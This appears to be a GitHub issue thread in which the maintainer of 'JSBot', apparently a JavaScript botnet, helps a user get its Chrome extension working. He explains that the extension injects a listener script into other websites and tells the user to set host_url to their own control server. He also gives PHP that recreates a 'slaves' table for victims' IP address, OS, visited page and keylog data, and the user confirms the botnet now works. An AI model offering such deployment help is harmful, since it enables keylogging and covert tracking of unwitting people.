### ISSUE TITLE
Extension not working

### ISSUE THREAD

**Issue by pdglobal** [derp-all-day/JSBot#4]
I've downloaded the extension, installed it in chrome, but I can still only see myself on the botnet when I'm actively viewing my website.

**Comment by derp-all-day** [comment]
This has to do with changes you've made to the listener.php file. The
extension calls it and injects it.

Not sure it this is the only issue, however, in your listener.php file you
changed the url variable to a relative path "/admin" so when you're loading
it on other websites it's looking for that relative path and not finding it
because it's not there.

**Comment by derp-all-day** [comment]
Set the host_url to "https://pdglobal.app/admin/" and that should fix your issue here. :)

**Comment by derp-all-day** [comment]
add this to your index.php file right after the ``include 'sys/head.php' near the top. Run once to recreate the table. and then remove the lines.
```
$db->table('slaves')->delete();
$db->table('slaves', array(
  'ip'          => 'string',
  'lastSeen'    => 'string',
  'firstSeen'   => 'string',
  'ua'          => 'string',
  'os'          => 'string',
  'uuid'        => 'string',
  'page'        => 'string',
  'keylog'      => 'string'
))->create();
die();
```

**Comment by pdglobal** [comment]
Okay I restored the current version of listener.php, and added the proper get paramater to my include, the plugin is now working.

**Comment by pdglobal** [comment]
I restored the original file from here, then added the proper get paramater to the request.

Plugin now seems to be working.
